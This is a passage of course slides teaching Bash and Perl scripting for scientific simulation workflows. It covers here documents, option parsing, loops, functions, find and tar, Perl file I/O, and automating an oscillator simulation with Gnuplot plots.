    cat is usually used for printing multi-line text
    (see next slide)
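    A short sketch of printf in the shell, with the numbers from the Hello World example used as fixed test data. It assumes a printf that accepts floating-point formats, which holds for Bash and for common /bin/sh implementations:

```shell
r=3.4
s=-0.255541102027

# %g gives a compact number, %12.5e scientific notation in a field of width 12
printf "Hello, World! sin(%g)=%12.5e\n" "$r" "$s"

# the format string is reused until all arguments are consumed
printf "%s=%g\n" m 1.0 b 0.7
```

    Unlike echo, printf adds no newline by itself, so the \n in the format string is required.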



    Convenient debugging tool: -x

    Each source code line is printed prior to its execution if you give -x as option to /bin/sh or /bin/bash
    Either in the header
    #!/bin/sh -x
    
    or on the command line:
    unix> /bin/sh -x hw.sh
    unix> sh -x hw.sh
    unix> bash -x hw.sh
    
    Very convenient during debugging



    File reading and writing

    Bourne shell and Bash are not much used for file reading and manipulation; usually one calls up Sed, Awk, Perl or Python to do file manipulation
    File writing is efficiently done by 'here documents':
    cat > myfile <<EOF
    multi-line text
    can now be inserted here,
    and variable interpolation
    a la $myvariable is
    supported. The final EOF must
    start in column 1 of the 
    script file.
    EOF
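    Variable interpolation in a here document can be switched off by quoting the delimiter. A small sketch (the function name heredoc_demo is made up for this illustration):

```shell
# heredoc_demo: hypothetical function that writes two here documents
heredoc_demo() {
    myvariable="some value"

    # unquoted delimiter: $myvariable is replaced by its value
    cat <<EOF
interpolated: $myvariable
EOF

    # quoted delimiter: the text is copied literally
    cat <<'EOF'
literal: $myvariable
EOF
}

heredoc_demo
```

    The quoted form is handy when the text itself is shell, Perl or Gnuplot code containing dollar signs.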
    



    Simulation and visualization script

    Typical application in numerical simulation:

    run a simulation program
    run a visualization program and produce graphs
    Programs are supposed to run in batch
    Putting the two commands in a file, with some glue, makes a classical Unix script



    Setting default parameters

    #!/bin/sh
    
    pi=3.14159
    m=1.0; b=0.7; c=5.0; func="y"; A=5.0; 
    w=`echo 2*$pi | bc`
    y0=0.2; tstop=30.0; dt=0.05; case="tmp1"
    screenplot=1
    



    Parsing command-line options

    # read variables from the command line, one by one:
    while [ $# -gt 0 ]  # $# = no of command-line args.
    do
        option=$1;   # load command-line arg into option (no spaces around =)
        shift;       # eat currently first command-line arg
        case "$option" in
    	-m)
    	    m=$1; shift; ;;  # load next command-line arg
    	-b)
    	    b=$1; shift; ;;
            ...
    	*)
    	    echo "$0: invalid option \"$option\""; exit ;;
        esac
    done
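    The parsing loop can be tried in isolation by wrapping it in a function. This is only a sketch: the wrapper parse_options is a hypothetical name, and only the -m and -b options are handled:

```shell
#!/bin/sh
# parse_options: hypothetical wrapper so the loop can be run on any argument list
parse_options() {
    m=1.0; b=0.7                      # default values
    while [ $# -gt 0 ]; do
        option=$1; shift              # eat the option name
        case "$option" in
            -m) m=$1; shift ;;        # eat the option value
            -b) b=$1; shift ;;
            *)  echo "$0: invalid option \"$option\"" >&2
                return 1 ;;
        esac
    done
    echo "m=$m b=$b"
}

parse_options -b 0.9 -m 3.2
```

    Options may come in any order, and options that are left out keep their default values.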
    



    Alternative to case: if

    case is standard when parsing command-line arguments in Bash, but if-tests can also be used. Consider
        case "$option" in
    	-m)
    	    m=$1; shift; ;;  # load next command-line arg
    	-b)
    	    b=$1; shift; ;;
    	*)
    	    echo "$0: invalid option \"$option\""; exit ;;
        esac
    
    versus
        if [ "$option" = "-m" ]; then
            m=$1; shift;  # load next command-line arg
        elif [ "$option" = "-b" ]; then
            b=$1; shift;
        else  
            echo "$0: invalid option \"$option\""; exit
        fi
    



    Creating a subdirectory

    dir=$case
    # check if $dir is a directory:
    if [ -d $dir ]
      # yes, it is; remove this directory tree
      then
        rm -r $dir
    fi
    mkdir $dir   # create new directory $dir
    cd $dir      # move to $dir
    
    # the 'then' statement can also appear on the 1st line:
    if [ -d $dir ]; then
      rm -r $dir
    fi
    
    # another form of if-tests:
    if test -d $dir; then
      rm -r $dir
    fi
    
    # and a shortcut:
    [ -d $dir ] && rm -r $dir
    test -d $dir && rm -r $dir
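    Since rm -r is destructive, a more defensive variant may be worth the extra lines. The sketch below (fresh_dir is a hypothetical name) quotes the variable, so names with spaces work, and refuses an empty name:

```shell
# fresh_dir: remove an old directory tree (if any), create it anew, move into it
fresh_dir() {
    dir=$1
    # an empty name would make the commands below act on the wrong place
    if [ -z "$dir" ]; then
        echo "fresh_dir: empty directory name" >&2
        return 1
    fi
    if [ -d "$dir" ]; then
        rm -r "$dir"
    fi
    mkdir "$dir" && cd "$dir"
}

# demo in a scratch area; the subshell keeps the caller's directory unchanged
(
    cd "$(mktemp -d)" || exit 1
    fresh_dir "my case" && pwd
)
```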
    



    Writing an input file

    'Here document' for multi-line output:
    # write to $case.i the lines that appear between
    # the EOF symbols:
    
    cat > $case.i <<EOF
            $m
            $b
            $c
            $func
            $A
            $w
            $y0
            $tstop
            $dt
    EOF
    



    Running the simulation

    Stand-alone programs can be run by just typing the name of the program
    If the program reads data from standard input, we can put the input in a file and redirect input:
    oscillator < $case.i
    
    Can check for successful execution:
    # the shell variable $? is 0 if last command
    # was successful, otherwise $? != 0
    
    if [ "$?" != "0" ]; then
      echo "running oscillator failed"; exit 1
    fi
    
    # exit n sets $? to n
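    The test on $? can also be folded into the if statement itself, since if inspects the exit status of the command it runs. A sketch with a hypothetical helper run_step; true and false stand in for real programs such as oscillator:

```shell
# run_step: hypothetical helper that runs a command and reports failure
run_step() {
    if ! "$@"; then
        echo "running $1 failed" >&2
        return 1
    fi
}

run_step true  && echo "true succeeded"
run_step false || echo "false failed with status $?"
```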
    



    Remark (1)

    Variables can in Bash be integers, strings or arrays
    For safety, declare the type of a variable if it is not a string:
    declare -i i   # i is an integer
    declare -a A   # A is an array
    



    Remark (2)

    Comparison of two integers uses a syntax different from comparison of two strings:
    if [ $i -lt 10 ]; then        # integer comparison
    if [ "$name" == "10" ]; then  # string  comparison
    
    Unless you have declared a variable to be an integer, assume that all variables are strings and use double quotes (strings) when comparing variables in an if test
    if [ "$?" != "0" ]; then  # this is safe
    if [  $?  !=  0  ]; then  # might be unsafe
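    The difference between the two kinds of comparison shows up when the same number is written in two ways. A small sketch (compare is a hypothetical helper):

```shell
# compare: hypothetical helper that reports how two values compare
compare() {
    if [ "$1" -eq "$2" ]; then echo "equal as integers"; fi
    if [ "$1" != "$2" ]; then echo "different as strings"; fi
}

compare 07 7

# quoting keeps the test well-formed even when the variable is empty;
# without the quotes, [ $empty != "0" ] would be a syntax error
empty=""
if [ "$empty" != "0" ]; then echo "empty string is not 0"; fi
```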
    



    Making plots

    Make Gnuplot script:
    echo "set title '$case: m=$m ...'" > $case.gnuplot
    ...
    # continue writing with a here document:
    cat >> $case.gnuplot <<EOF
    set size ratio 0.3 1.5, 1.0;  
    ...
    plot 'sim.dat' title 'y(t)' with lines;
    ...
    EOF
    
    Run Gnuplot:
    gnuplot -geometry 800x200 -persist $case.gnuplot
    if [ "$?" != "0" ]; then
      echo "running gnuplot failed"; exit 1
    fi
    



    Some common tasks in Bash

    file writing
    for-loops
    running an application
    pipes
    writing functions
    file globbing, testing file types
    copying and renaming files, creating and moving to directories, creating directory paths, removing files and directories
    directory tree traversal
    packing directory trees



    File writing

    outfilename="myprog2.cpp"
    
    # append multi-line text (here document):
    cat >> $outfilename <<EOF
    /*
      This file, "$outfilename", is a version
      of "$infilename" where each line is numbered.
    */
    EOF
    
    # other applications of cat:
    cat myfile             # write myfile to the screen
    cat myfile >  yourfile # write myfile to yourfile
    cat myfile >> yourfile # append myfile to yourfile
    cat myfile | wc        # send myfile as input to wc
    



    For-loops

    The for element in list construction:
    files=`/bin/ls *.tmp`
    # we use /bin/ls in case ls is aliased
    
    for file in $files
    do
      echo removing $file
      rm -f $file
    done
    
    Traverse command-line arguments:
    for arg; do
      # do something with $arg
    done
    
    # or full syntax; command-line args are stored in $@
    for arg in $@; do
      # do something with $arg
    done
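    Whether $@ is quoted matters as soon as an argument contains a space. The sketch below counts arguments both ways (both function names are made up for the illustration):

```shell
# "$@" keeps each command-line argument as one word
count_args() {
    n=0
    for arg in "$@"; do n=$((n + 1)); done
    echo "$n"
}

# unquoted $@ is split again at spaces
count_args_unquoted() {
    n=0
    for arg in $@; do n=$((n + 1)); done
    echo "$n"
}

count_args          "my file.txt" other.txt    # prints 2
count_args_unquoted "my file.txt" other.txt    # prints 3
```

    The short form for arg; do behaves like the quoted version.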
    



    Counters

    Declare an integer counter:
    declare -i counter
    counter=0
    # arithmetic expressions must appear inside (( ))
    ((counter++))
    echo $counter  # yields 1
    
    For-loop with counter:
    declare -i n; n=1
    for arg in $@; do
      echo "command-line argument no. $n is <$arg>"
      ((n++))
    done
    



    C-style for-loops

    declare -i i
    for ((i=0; i<$n; i++)); do 
      echo $i
    done
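    declare, (( )) and the C-style for-loop are Bash features. When a script must run under plain /bin/sh, a while loop with arithmetic expansion $(( )) does the same job. A sketch (count_up is a hypothetical name):

```shell
# count_up: hypothetical function printing 0, 1, ..., n-1
count_up() {
    n=$1
    i=0
    while [ "$i" -lt "$n" ]; do
        echo "$i"
        i=$((i + 1))      # arithmetic expansion, no declare needed
    done
}

count_up 3
```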
    



    Example: bundle files

    Pack a series of files into one file
    Executing this single file as a Bash script unpacks all the individual files again (!)
    Usage:
    bundle file1 file2 file3 > onefile  # pack
    bash onefile # unpack
    
    Writing bundle is easy:
    #!/bin/sh
    for i in $@; do
        echo "echo unpacking file $i"
        echo "cat > $i <<EOF"
        cat $i
        echo "EOF"
    done
    



    The bundle output file

    Consider 2 fake files; file1
    Hello, World!
    No sine computations today
    
    and file2
    1.0 2.0 4.0
    0.1 0.2 0.4
    
    Running bundle file1 file2 yields the output
    echo unpacking file file1
    cat > file1 <<EOF
    Hello, World!
    No sine computations today
    EOF
    echo unpacking file file2
    cat > file2 <<EOF
    1.0 2.0 4.0
    0.1 0.2 0.4
    EOF
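    One weakness of the simple bundle script is that the unpacking shell interpolates variables in the packed text, so a file containing $HOME or `...` is changed on the way. A possible remedy, sketched here as a function, is to quote the delimiter. Files that contain a line consisting of EOF, or file names with spaces, are still not handled:

```shell
# bundle: pack the named files into a shell script written to standard output
bundle() {
    for i in "$@"; do
        echo "echo unpacking file $i"
        # quoted delimiter: the unpacking shell copies the lines literally
        echo "cat > $i <<'EOF'"
        cat "$i"
        echo "EOF"
    done
}

# demo in a scratch directory (the subshell leaves the caller's directory alone)
(
    cd "$(mktemp -d)" || exit 1
    printf 'price: $5 for $HOME\n' > file1
    bundle file1 > onefile
    rm file1
    sh onefile
    cat file1
)
```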
    



    Running an application

    Running in the foreground:
    cmd="myprog -c file.1 -p -f -q";
    $cmd < my_input_file
    
    # output is directed to the file res
    $cmd < my_input_file > res
    
    # process res file by Sed, Awk, Perl or Python
    
    Running in the background:
    myprog -c file.1 -p -f -q < my_input_file &
    
    or stop a foreground job with Ctrl-Z and then type bg



    Pipes

    Output from one command can be sent as input to another command via a pipe
    # send files with size to sort -rn
    # (reverse numerical sort) to get a list 
    # of files sorted by size:
    
    /bin/ls -s | sort -rn
    
    
    cat $case.i | oscillator
    # is the same as
    oscillator < $case.i
    
    Make a new application: sort all files in a directory tree root, with the largest files appearing first, and equip the output with paging functionality:
    du -a root | sort -rn | less
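    The -n option matters in such pipelines, because sort compares text by default. A sketch with fixed sample data; the function sizes is a hypothetical stand-in for the output of ls -s:

```shell
# sizes: stand-in for "ls -s" output (size in blocks, then filename)
sizes() {
    printf '3 c.txt\n10 a.txt\n2 b.txt\n'
}

sizes | sort -rn | head -n 1     # numerical comparison: 10 a.txt
sizes | sort -r  | head -n 1     # textual comparison:   3 c.txt
```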
    



    Numerical expressions

    Numerical expressions can be evaluated using bc:
    echo "s(1.2)" | bc -l  # the sine of 1.2
    # -l loads the math library for bc
    
    echo "e(1.2) + c(0)" | bc -l  # exp(1.2)+cos(0)
    
    # assignment:
    s=`echo "s($r)" | bc -l`
    
    # or using Perl:
    s=`perl -e "print sin($r)"`
    



    Functions

    # compute x^5*exp(-x) if x>0, else 0 :
    
    function calc() { 
       echo " 
       if ( $1 >= 0.0 ) {
          ($1)^5*e(-($1))
       } else {
          0.0
       } " | bc -l
    }
    
    # function arguments: $1 $2 $3 and so on
    # result: the text the function writes to standard output (here by bc)
    
    # call:
    r=4.2
    s=`calc $r`
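    A shell function can deliver a result in two ways: as text on standard output (captured with back quotes or $(...)), or as an exit status that if can test. The sketch below shows both. Note that it swaps bc for awk, assumed to be installed, and that is_positive is a hypothetical name:

```shell
# calc: print x^5*exp(-x) if x >= 0, else 0 (result as text)
calc() {
    awk -v x="$1" 'BEGIN { if (x >= 0) print x^5 * exp(-x); else print 0 }'
}

# is_positive: exit status 0 (true) if x > 0, else 1 (result as status)
is_positive() {
    awk -v x="$1" 'BEGIN { exit !(x > 0) }'
}

r=4.2
if is_positive "$r"; then
    s=$(calc "$r")
    echo "calc($r)=$s"
fi
```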
    



    Another function example

    #!/bin/bash
    
    function statistics {
      avg=0; n=0
      for i in $@; do
        avg=`echo $avg + $i | bc -l`
        n=`echo $n + 1 | bc -l`
      done
      avg=`echo $avg/$n | bc -l`
    
      max=$1; min=$1; shift;
      for i in $@; do
        if [ `echo "$i < $min" | bc -l` != 0 ]; then
          min=$i; fi
        if [ `echo "$i > $max" | bc -l` != 0 ]; then
          max=$i; fi
      done
      printf "%.3f %g %g\n" $avg $min $max
    }
    



    Calling the function

    statistics 1.2 6 -998.1 1 0.1
    
    # statistics returns a list of numbers
    res=`statistics 1.2 6 -998.1 1 0.1`
    
    for r in $res; do echo "result=$r"; done
    
    echo "average, min and max = $res"
    



    File globbing

    List all .ps and .gif files using wildcard notation:
    files=`ls *.ps *.gif`
    
    # or safer, if you have aliased ls:
    files=`/bin/ls *.ps *.gif`
    
    # compress and move the files:
    gzip $files
    for file in $files; do
      mv ${file}.gz $HOME/images
    done
    



    Testing file types

    if [ -f $myfile ]; then
        echo "$myfile is a plain file"
    fi
    
    # or equivalently:
    if test -f $myfile; then
        echo "$myfile is a plain file"
    fi
    
    if [ ! -d $myfile ]; then
        echo "$myfile is NOT a directory"
    fi
    
    if [ -x $myfile ]; then
        echo "$myfile is executable"
    fi
    
    # -s is true for a file with size > 0 (-z tests for an empty string):
    [ ! -s $myfile ] && echo "empty file $myfile"
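    The individual tests can be combined into one classification function. This is a sketch only; the name describe and the category texts are made up:

```shell
# describe: print a one-word-ish classification of the path in $1
describe() {
    if   [ -d "$1" ];   then echo "directory"
    elif [ ! -e "$1" ]; then echo "missing"
    elif [ ! -s "$1" ]; then echo "empty file"
    elif [ -x "$1" ];   then echo "executable file"
    else                     echo "plain file"
    fi
}

describe /            # directory
describe /no/such/x   # missing
```

    The order of the tests matters: a directory is usually also executable, so -d is checked first.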
    



    Rename, copy and remove files

    # rename $myfile to tmp.1:
    mv $myfile tmp.1
    
    # force renaming:
    mv -f $myfile tmp.1
    
    # move a directory tree mytree to $root:
    mv mytree $root
    
    # copy myfile to $tmpfile:
    cp myfile $tmpfile
    
    # copy a directory tree mytree recursively to $root:
    cp -r mytree $root
    
    # remove myfile and all files with suffix .ps:
    rm myfile *.ps
    
    # remove a non-empty directory tmp/mydir:
    rm -r tmp/mydir
    



    Directory management

    # make directory:
    dir="mynewdir"
    mkdir $dir
    mkdir -m 0755 $dir  # readable for all
    mkdir -m 0700 $dir  # readable for owner only
    mkdir -m 0777 $dir  # all rights for all
    
    # move to $dir
    cd $dir
    # move to $HOME
    cd
    
    # create intermediate directories (the whole path):
    mkdirhier $HOME/bash/prosjects/test1
    # or with GNU mkdir:
    mkdir -p  $HOME/bash/prosjects/test1
    



    The find command

    Very useful command!

    find visits all files in a directory tree and can execute one or more commands for every file
    Basic example: find the oscillator codes
    find $scripting/src -name 'oscillator*' -print
    
    Or find all PostScript files
    find $HOME \( -name '*.ps' -o -name '*.eps' \) -print
    
    We can also run a command for each file:
    find rootdir -name filenamespec -exec command {} \; -print
    # {} is the current filename
    



    Applications of find (1)

    Find all files larger than 2000 blocks of 512 bytes (about 1 Mb):
    find $HOME -name '*' -type f -size +2000 -exec ls -s {} \;
    
    Remove all these files:
    find $HOME -name '*' -type f -size +2000 \
         -exec ls -s {} \; -exec rm -f {} \;
    
    or ask the user for permission to remove:
    find $HOME -name '*' -type f -size +2000 \
         -exec ls -s {} \; -ok rm -f {} \;
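    The size search can be packaged as small functions. In this sketch (both function names are hypothetical) the -name '*' test is left out, since it matches every file anyway, and {} + is used so that ls is started once for many files instead of once per file:

```shell
# big_files: list regular files under directory $1 that are larger
# than $2 blocks of 512 bytes
big_files() {
    find "$1" -type f -size +"$2" -print
}

# big_files_with_size: as above, but run ls -s on the files found
big_files_with_size() {
    find "$1" -type f -size +"$2" -exec ls -s {} +
}

# typical call (not executed here): big_files "$HOME" 2000
```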
    



    Applications of find (2)

    Find all files not being accessed for the last 90 days:
    find $HOME -name '*' -atime +90 -print
    
    and move these to /tmp/trash:
    find $HOME -name '*' -atime +90 -print \
         -exec mv -f {} /tmp/trash \;
    
    Note: on some older Unix systems this one does seemingly nothing...
    find ~hpl/projects -name '*.tex'
    
    because it lacks the -print option for printing the names of all *.tex files (common mistake; GNU find and other POSIX-conforming versions print by default)



    Tar and gzip

    The tar command can pack single files or all files in a directory tree into one file, which can be unpacked later
    tar -cvf myfiles.tar mytree file1 file2
    
    # options:
    # c: pack, v: list name of files, f: pack into file
    
    # unpack the mytree tree and the files file1 and file2:
    tar -xvf myfiles.tar
    
    # options:
    # x: extract (unpack)
    
    The tarfile can be compressed:
    gzip myfiles.tar
    
    # result: myfiles.tar.gz
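    Packing and compressing can be combined with a pipe, so that no uncompressed tar file is left on disk. A sketch, assuming tar and gzip are installed (pack and unpack are hypothetical function names):

```shell
# pack <archive.tar.gz> <tree>: tar writes to standard output (-f -), gzip compresses
pack() {
    tar -cf - "$2" | gzip > "$1"
}

# unpack <archive.tar.gz>: gzip decompresses to standard output, tar reads it
unpack() {
    gzip -dc "$1" | tar -xf -
}

# round trip in a scratch directory
(
    cd "$(mktemp -d)" || exit 1
    mkdir mytree && echo "some data" > mytree/file1
    pack mytree.tar.gz mytree
    rm -r mytree
    unpack mytree.tar.gz
    cat mytree/file1
)
```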
    



    Two find/tar/gzip examples

    Pack all PostScript figures:
    tar -cvf ps.tar `find $HOME -name '*.ps' -print`
    gzip ps.tar
    
    Pack a directory but remove CVS directories and redundant files
    # take a copy of the original directory:
    cp -r myhacks /tmp/oblig1-hpl
    # remove CVS directories
    find /tmp/oblig1-hpl -name CVS -print -exec rm -rf {} \;
    # remove redundant files:
    find /tmp/oblig1-hpl \( -name '*~' -o -name '*.bak' \
     -o -name '*.log' \) -print -exec rm -f {} \;
    # pack files:
    tar -cf oblig1-hpl.tar /tmp/oblig1-hpl
    gzip oblig1-hpl.tar
    # send oblig1-hpl.tar.gz as mail attachment
    





    Intro to Perl programming




    Required software

    For the Perl part of this course you will need

    Perl in a recent version (5.8)
    the following packages: Bundle::libnet, Tk, LWP::Simple, CGI::Debug, CGI::QuickForm



    Scientific Hello World script

    We start with writing "Hello, World!" and computing the sine of a number given on the command line
    The script (hw.pl) should be run like this:
    perl hw.pl 3.4
    
    or just (Unix)
    ./hw.pl 3.4
    
    Output:
    Hello, World! sin(3.4)=-0.255541102027
    



    Purpose of this script

    Demonstrate

    how to read a command-line argument
    how to call a math (sine) function
    how to work with variables
    how to print text and numbers



    The code

    File hw.pl:
    #!/usr/bin/perl
    
    # fetch the first (0) command-line argument:
    $r = $ARGV[0];  
    
    # compute sin(r) and store in variable $s:
    $s = sin($r);   
    
    # print to standard output:
    print "Hello, World! sin($r)=$s\n"; 
    



    Comments (1)

    The first line specifies the interpreter of the script (here /usr/bin/perl)
    perl hw.pl 1.4   # first line: just a comment
    ./hw.pl 1.4      # first line: interpreter spec.
    
    Scalar variables in Perl start with a dollar sign
    Each statement must end with a semicolon
    The command-line arguments are stored in an array ARGV
    $r = $ARGV[0];  # get the first command-line argument
    



    Comments (2)

    Strings are automatically converted to numbers if necessary
    $s = sin($r)
    
    (recall Python's need to convert r to float)
    Perl supports variable interpolation
    (variables are inserted directly into the string):
    print "Hello, World! sin($r)=$s\n";
    
    or we can control the format using printf:
    printf "Hello, World! sin(%g)=%12.5e\n", $r, $s;
    
    (printf in Perl works like printf in C)



    Note about strings in Perl

    Only double-quoted strings work with variable interpolation:
    print "Hello, World! sin($r)=$s\n";
    
    Single-quoted strings do not recognize Perl variables:
    print 'Hello, World! sin($r)=$s\n';
    
    yields the output
    Hello, World! sin($r)=$s
    
    Single- and double-quoted strings can span several lines (a la triple-quoted strings in Python)



    Where to find complete Perl info?

    Use perldoc to read Perl man pages:
    perldoc perl       # overview of all Perl man pages
    perldoc perlsub    # read about subroutines
    perldoc Cwd        # look up a special module, here 'Cwd'
    perldoc -f printf  # look up a special function, here 'printf'
    perldoc -q cgi     # search the FAQ for the text 'cgi'
    
    Become familiar with the man pages
    Does Perl have a function for ...? Check perlfunc
    Very useful Web site: www.perldoc.com
    Alternative: The 'Camel book'
    (much of the man pages are taken from that book)
    Many textbooks have more accessible info about Perl



    Reading/writing data files

    Tasks:

    Read (x,y) data from a two-column file
    Transform y values to f(y)
    Write (x,f(y)) to a new file
    What to learn:

    File opening, reading, writing, closing
    How to write and call a function
    How to work with arrays
    File: src/perl/datatrans1.pl



    Reading input/output filenames

    Read two command-line arguments: input and output filenames
    ($infilename, $outfilename) = @ARGV;
    
    the variables in the list on the left are set, one by one, to the elements of the @ARGV array
    Could also write
    $infilename  = $ARGV[0];
    $outfilename = $ARGV[1];
    
    but this is less perl-ish



    Error handling

    What if the user fails to provide two command-line arguments?
    die "Usage: $0 infilename outfilename" if $#ARGV < 1;
    
    # $#ARGV is the largest valid index in @ARGV,
    # the length of @ARGV is then $#ARGV+1 (first index is 0)
    
    die terminates the program
    (with exit status different from 0)



    Open file and read line by line

    Open files:
    open(INFILE,  "<$infilename");   # open for reading
    open(OUTFILE, ">$outfilename");  # open for writing
    
    open(APPFILE, ">>$outfilename"); # open for appending
    
    Read line by line:
    while (defined($line=<INFILE>)) {
        # process $line
    }
    



    Defining a function

    sub myfunc {
    
        my ($y) = @_;
    
        # all arguments to the function are stored
        # in the array @_
        # the my keyword defines local variables
    
        # more general example on extracting arguments:
        # my ($arg1, $arg2, $arg3) = @_;
    
        if ($y >= 0.0) { 
            return $y**5.0*exp(-$y); 
        }
        else { 
            return 0.0; 
        }
    }
    
    Functions can be put anywhere in a file



    Data transformation loop

    Input file format: two columns of numbers
    0.1   1.4397
    0.2   4.325
    0.5   9.0
    
    Read (x,y), transform y, write (x,f(y)):
    while (defined($line=<INFILE>)) {
        ($x,$y) = split(' ', $line); # extract x and y value
        $fy = myfunc($y);  # transform y value
        printf(OUTFILE "%g  %12.5e\n", $x, $fy);
    }
    
    Close files:
    close(INFILE); close(OUTFILE);
    



    Unsuccessful file opening

    The script runs without error messages if the file does not exist (recall that Python by default issues error messages in case of non-existing files)
    In Perl we should test explicitly for successful operations and issue error messages
    open(INFILE,  "<$infilename") 
        or die "unsuccessful opening of $infilename; $!\n";
    
    # $! is a variable containing the error message from
    # the operating system ('No such file or directory' here)
    



    The code (1)

    : # *-*-perl-*-*
      eval 'exec perl -w -S  $0 ${1+"$@"}' 
        if 0;  # if running under some shell
    
    die "Usage: $0 infilename outfilename\n" if $#ARGV < 1;
    
    ($infilename, $outfilename) = @ARGV;
    
    open(INFILE,  "<$infilename") or die "$!\n";
    open(OUTFILE, ">$outfilename") or die "$!\n";
    
    sub myfunc {
        my ($y) = @_;
        if ($y >= 0.0) { return $y**5.0*exp(-$y); }
        else           { return 0.0; }
    }
    



    Comments

    Perl has a flexible syntax:
    if ($#ARGV < 1) {
        die "Usage: $0 infilename outfilename\n";
    }
    
    die "Usage: $0 infilename outfilename\n" if $#ARGV < 1;
    
    Parentheses can be left out from function calls:
    open INFILE, "<$infilename";  # open for reading
    
    Functions (subroutines) extract arguments from the list @_
    Subroutine variables are global by default; the my prefix makes them local



    The code (2)

    # read one line at a time:
    while (defined($line=<INFILE>)) {
        ($x, $y) = split(' ', $line); # extract x and y value
        $fy = myfunc($y);  # transform y value
        printf(OUTFILE "%g  %12.5e\n", $x, $fy);
    }
    close(INFILE); close(OUTFILE);
    



    Loading data into arrays

    Read input file into list of lines:
    @lines = <INFILE>;
    
    Store x and y data in arrays:
    # go through each line and split line into x and y columns
    @x = (); @y = ();   # store data pairs in two arrays x and y
    for $line (@lines) {
        ($xval, $yval) = split(' ', $line);
        push(@x, $xval);  push(@y, $yval);
    }
    



    Array loop

    For-loop in Perl:
    for ($i = 0; $i <= $last_index; $i++) { ... }
    
    Loop over (x,y) values:
    open(OUTFILE, ">$outfilename")
        or die "unsuccessful opening of $outfilename; $!\n";
    
    for ($i = 0; $i <= $#x; $i++) {
        $fy = myfunc($y[$i]);  # transform y value
        printf(OUTFILE "%g  %12.5e\n", $x[$i], $fy);
    }
    close(OUTFILE);
    
    File: src/perl/datatrans2.pl



    Terminology: array vs list

    Perl distinguishes between array and list
    Short story: array is the variable, and it can have a list or its length as values, depending on the context
    @myarr    =   (1, 99, 3, 6);
    # array            list
    
    List context: the value of @myarr is a list
    @q = @myarr;  # array q gets the same entries as @myarr
    
    Scalar context: the value of @myarr is its length
    $q = @myarr;  # q becomes the no of elements in @myarr
    



    Convenient use of arrays in a scalar context

    Can use the array as loop limit:
    for ($i = 0; $i < @x; $i++) {
        # work with $x[$i] ...
    }
    
    Can test on @ARGV for the number of command-line arguments:
    die "Usage: $0 infilename outfilename" unless @ARGV >= 2;
    # instead of
    die "Usage: $0 infilename outfilename" if $#ARGV < 1;
    



    Running a script

    Method 1: write just the name of the scriptfile:
    ./datatrans1.pl infile outfile
    
    or
    datatrans1.pl infile outfile
    
    if . (current working directory) or the directory containing datatrans1.pl is in the path
    Method 2: run an interpreter explicitly:
    perl datatrans1.pl infile outfile
    
    Use the first perl program found in the path
    On Windows machines one must use method 2



    About headers (1)

    In method 1, the first line specifies the interpreter
    Explicit path to the interpreter:
    #!/usr/local/bin/perl
    #!/usr/home/hpl/scripting/Linux/bin/perl
    
    Using env to find the first Perl interpreter in the path
    #!/usr/bin/env perl
    
    is not a good idea because it does not always work with
    #!/usr/bin/env perl -w
    
    i.e. Perl with warnings (ok on SunOS, not on Linux)
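
    One possible workaround, which is not the header recommended in these notes, is to keep the env header free of options and turn warnings on inside the script with the warnings pragma (available since Perl 5.6). The sketch below catches the warning in a handler only to make the effect visible; the variable names are illustrative.

```perl
#!/usr/bin/env perl
# No -w on the header line; warnings are enabled by the pragma instead.
use strict;
use warnings;

# Capture warnings so the effect is visible.
my @caught;
local $SIG{__WARN__} = sub { push @caught, $_[0] };

my $undefined;
my $text = "value: " . $undefined;   # triggers an "uninitialized" warning

print "warnings caught: ", scalar(@caught), "\n";
```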



    About headers (2)

    Using Bourne shell to find the first Perl interpreter in the path:
    : # *-*-perl-*-*
      eval 'exec perl -w -S  $0 ${1+"$@"}' 
        if 0;  # if running under some shell
    
    Run src/perl/headerfun.sh for an in-depth explanation
    The latter header makes it easy to move scripts from one machine to another
    Nevertheless, sometimes you need to ensure that all users apply a specific Perl interpreter



    Simulation example

    Code: oscillator (written in Fortran 77)



    Usage of the simulation code

    Input: m, b, c, and so on read from standard input
    How to run the code:
    oscillator < file
    
    where file can be
    3.0
    0.04
    1.0
    ...
    
    Results (t, y(t)) in a file sim.dat



    A plot of the solution



    Plotting graphs in Gnuplot

    Commands:
    set title 'case: m=3 b=0.7 c=1 f(y)=y A=5 ...';
    
    # screen plot: (x,y) data are in the file sim.dat
    plot 'sim.dat' title 'y(t)' with lines;
    
    # hardcopies:
    set size ratio 0.3 1.5, 1.0;  
    set term postscript eps mono dashed 'Times-Roman' 28;
    set output 'case.ps';
    plot 'sim.dat' title 'y(t)' with lines;
    
    # make a plot in PNG format as well:
    set term png small;
    set output 'case.png';
    plot 'sim.dat' title 'y(t)' with lines;
    
    Commands can be given interactively or put in a file



    Typical manual work

    Change oscillating system parameters by editing the simulator input file
    Run simulator:
    oscillator < inputfile
    
    Plot:
    gnuplot -persist -geometry 800x200 case.gp
    
    (case.gp contains Gnuplot commands)
    Plot annotations must be consistent with inputfile
    Let's automate!



    Deciding on the script's interface

    Usage:
    ./simviz1.pl -m 3.2 -b 0.9 -dt 0.01 -case run1
    
    Sensible default values for all options
    Put simulation and plot files in a subdirectory (specified by -case run1)
    File: src/perl/simviz1.pl



    The script's task

    Set default values of m, b, c etc.
    Parse command-line options (-m, -b etc.) and assign new values to m, b, c etc.
    Create and move to subdirectory
    Write input file for the simulator
    Run simulator
    Write Gnuplot commands in a file
    Run Gnuplot



    Parsing command-line options

    Set default values of the script's input parameters:
    $m = 1.0; $b = 0.7; $c = 5.0; $func = "y"; $A = 5.0; 
    $w = 2*3.14159; $y0 = 0.2; $tstop = 30.0; $dt = 0.05; 
    $case = "tmp1";  $screenplot = 1;
    
    Examine command-line options:
    # read variables from the command line, one by one:
    while (@ARGV) {
        $option = shift @ARGV;   # load cmd-line arg into $option
        if ($option eq "-m") { 
            $m = shift @ARGV;    # load next command-line arg
        }
        elsif ($option eq "-b")  { $b = shift @ARGV; }
        ...
    }
    
    shift 'eats' (extracts and removes) the first array element
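
    The effect of shift can be tried without a real command line. In this sketch the array @args stands in for @ARGV, and only two of the options (-m and -c) are handled; unknown options abort the script, which is an added assumption rather than the behaviour of simviz1.pl.

```perl
use strict;
use warnings;

# Simulated command line; in a real script @ARGV is filled by Perl.
my @args = ("-m", "3.2", "-c", "0.9");

my $m = 1.0;   # default values
my $c = 5.0;

while (@args) {                    # true while elements remain
    my $option = shift @args;      # removes and returns the first element
    if    ($option eq "-m") { $m = shift @args; }
    elsif ($option eq "-c") { $c = shift @args; }
    else  { die "unknown option $option\n"; }
}
print "m=$m c=$c, remaining args: ", scalar(@args), "\n";
```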



    Alternative parsing: GetOptions

